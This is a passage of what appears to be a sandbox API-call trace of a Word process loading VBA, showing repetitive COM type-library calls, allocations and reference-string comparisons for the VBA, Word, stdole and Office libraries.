This=0x1d39d552b18, index=0xdb, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdc, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdd, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xde, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdf, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe0, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe1, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe2, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe3, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe4, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe5, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe6, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe7, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe8, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe9, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xea, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xeb, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xec, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xed, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xee, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xef, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf0, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf1, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf2, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.201] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf3, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.201] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.202] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf4, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.202] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.202] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf5, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.202] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.202] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf6, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.202] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.202] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf7, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.202] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.202] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf8, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.202] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.202] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6398 | out: ppvObject=0x33e4fb6398*=0x1d39d552a68) returned 0x0 [0060.202] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb63a8 | out: pVarVal=0x33e4fb63a8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b9, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.202] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.202] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb63a0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb62b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.202] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.202] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6350 | out: ppvObject=0x33e4fb6350*=0x0) returned 0x80004002 [0060.202] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb6378, pDummy=0x33e4fb6350 | out: ppTypeAttr=0x33e4fb6378, pDummy=0x33e4fb6350*=0x0) returned 0x0 [0060.202] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.202] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.202] IUnknown:Release (This=0x1d39d552bc8) returned 0x3 [0060.203] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.203] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x4 [0060.203] IUnknown:Release (This=0x1d39d552bc8) returned 0x3 [0060.204] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.204] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552a68, ppTypeAttr=0x33e4fb6678, pDummy=0x1d39d8e74c0 | out: ppTypeAttr=0x33e4fb6678, pDummy=0x1d39d8e74c0*=0x7) returned 0x0 [0060.204] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552a68) returned 0x0 [0060.204] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.204] CoCreateGuid (in: pguid=0x33e4fb6830 | out: pguid=0x33e4fb6830*(Data1=0xcaa1731f, Data2=0x4cf3, Data3=0x416f, Data4=([0]=0x95, [1]=0xcf, [2]=0x74, [3]=0xf1, [4]=0x59, [5]=0x21, [6]=0xa2, [7]=0xd1))) returned 0x0 [0060.204] CoCreateGuid (in: pguid=0x33e4fb6830 | out: pguid=0x33e4fb6830*(Data1=0xbd36eb55, Data2=0x1503, Data3=0x4b51, Data4=([0]=0x81, [1]=0x21, [2]=0x40, [3]=0xea, [4]=0x98, [5]=0x37, [6]=0x31, [7]=0x7a))) returned 0x0 [0060.204] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x14) returned 0x1d39dbb1f30 [0060.204] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.204] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6968 | out: ppvObject=0x33e4fb6968*=0x0) returned 0x80004002 [0060.204] IUnknown:Release (This=0x1d39d552bc8) returned 0x3 [0060.204] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6968 | out: ppvObject=0x33e4fb6968*=0x0) returned 0x80004002 [0060.204] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.204] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6968 | out: ppvObject=0x33e4fb6968*=0x0) returned 0x80004002 [0060.204] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d8257b0 [0060.204] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39da828c0 [0060.204] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39da82380 [0060.204] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8afb30 [0060.204] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b0af0 [0060.204] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6968 | out: ppvObject=0x33e4fb6968*=0x0) returned 0x80004002 [0060.204] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6968 | out: ppvObject=0x33e4fb6968*=0x0) returned 0x80004002 [0060.204] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6968 | out: ppvObject=0x33e4fb6968*=0x0) returned 0x80004002 [0060.205] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x50) returned 0x1d39dbe4510 [0060.205] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0060.205] IUnknown:AddRef (This=0x1d3980663b0) returned 0x4 [0060.205] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb5e98, pDummy=0x0 | out: ppTLibAttr=0x33e4fb5e98, pDummy=0x0) returned 0x0 [0060.205] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0xe4fb5eb0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.205] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39d5f7f70 [0060.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x33e4fb5f20, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLLí\x8cÓ\x01", lpUsedDefaultChar=0x0) returned 66 [0060.205] strcpy_s (in: _Dst=0x1d39d8b1e08, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0060.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x33e4fb6030, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0060.205] strcpy_s (in: _Dst=0x1d39d8b1e58, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0060.205] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39d5fa640 [0060.205] IUnknown:AddRef (This=0x1d3980663b0) returned 0x5 [0060.205] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.205] IUnknown:Release (This=0x1d3980663b0) returned 0x4 [0060.205] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0060.205] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0060.205] IUnknown:AddRef (This=0x1d3985c4c00) returned 0xb [0060.206] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb5e98, pDummy=0x0 | out: ppTLibAttr=0x33e4fb5e98, pDummy=0x0) returned 0x0 [0060.206] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb5eb0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x33e4fb5f20, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0060.206] strcpy_s (in: _Dst=0x1d39d8b1ec8, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0060.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x33e4fb6030, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0060.206] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8afd70 [0060.206] strcpy_s (in: _Dst=0x1d39d8afd98, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0060.206] IUnknown:AddRef (This=0x1d3985c4c00) returned 0xc [0060.206] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0060.206] IUnknown:Release (This=0x1d3985c4c00) returned 0xb [0060.206] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0060.206] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0060.206] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0 [0060.206] IUnknown:AddRef (This=0x1d3980655f0) returned 0x6 [0060.206] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980655f0, ppTLibAttr=0x33e4fb5e98, pDummy=0x0 | out: ppTLibAttr=0x33e4fb5e98, pDummy=0x0) returned 0x0 [0060.206] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0xe4fb5eb0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x33e4fb5f20, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\stdole2.tlbce\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0060.207] strcpy_s (in: _Dst=0x1d39d8afe08, _DstSize=0x20, _Src="C:\\Windows\\System32\\stdole2.tlb" | out: _Dst="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0060.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x33e4fb6030, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0060.207] strcpy_s (in: _Dst=0x1d39d8afe30, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0060.207] IUnknown:AddRef (This=0x1d3980655f0) returned 0x7 [0060.207] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980655f0) returned 0x0 [0060.207] IUnknown:Release (This=0x1d3980655f0) returned 0x6 [0060.207] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0060.207] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0060.207] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 2 [0060.208] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0060.208] IUnknown:AddRef (This=0x1d3985c5700) returned 0x3 [0060.208] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c5700, ppTLibAttr=0x33e4fb5e98, pDummy=0x0 | out: ppTLibAttr=0x33e4fb5e98, pDummy=0x0) returned 0x0 [0060.208] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c5700, index=-1, refPtrFlags=0xe4fb5eb0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x33e4fb5f20, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 63 [0060.208] strcpy_s (in: _Dst=0x1d39d8afea0, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0060.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x33e4fb6030, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0060.208] strcpy_s (in: _Dst=0x1d39d8afee8, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0060.208] IUnknown:AddRef (This=0x1d3985c5700) returned 0x4 [0060.208] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c5700) returned 0x0 [0060.208] IUnknown:Release (This=0x1d3985c5700) returned 0x3 [0060.208] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5ae0 | out: ppvObject=0x33e4fb5ae0*=0x0) returned 0x80004002 [0060.208] IUnknown:AddRef (This=0x1d39d552b18) returned 0x3 [0060.208] 